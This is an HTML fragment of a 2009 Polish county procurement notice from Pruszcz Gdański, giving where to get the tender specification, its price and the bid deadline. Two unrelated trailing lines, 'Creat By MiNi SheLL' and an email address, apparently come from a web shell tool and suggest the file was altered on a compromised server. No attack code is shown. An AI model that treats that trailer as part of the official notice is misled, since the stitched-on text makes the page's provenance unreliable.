<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat-gdanski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, pok. nr 122. Specyfikacja odpłatna 870,00zł  - ewentualne koszty przesyłki 11,90 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2009 godzina 11:30, miejsce: Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, 83 - 000 Pruszcz Gdański, Sekretariat pok. Nr 101.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com